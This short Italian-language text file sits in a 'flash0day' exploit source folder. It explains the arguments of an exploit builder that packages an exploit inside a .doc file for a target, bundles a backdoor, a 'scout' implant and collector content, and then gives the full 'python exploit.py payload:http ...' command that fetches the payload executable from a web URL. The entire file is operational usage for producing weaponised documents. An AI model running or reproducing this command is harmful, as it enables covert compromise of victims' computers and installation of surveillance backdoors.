src/flash0day/cmd.TXT
sendtotarget.zip -> contiene il .doc con l'exploit
originale.doc -> .doc in input
ior.doc -> nome documento in output
putty.exe -> path della backdoor
server.zip -> contenuto che va sul collector
backoffice.exe -> nome dello scout
python exploit.py payload:http http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe sendtotarget.zip originale.doc ior.doc putty.exe server.zip backoffice.exe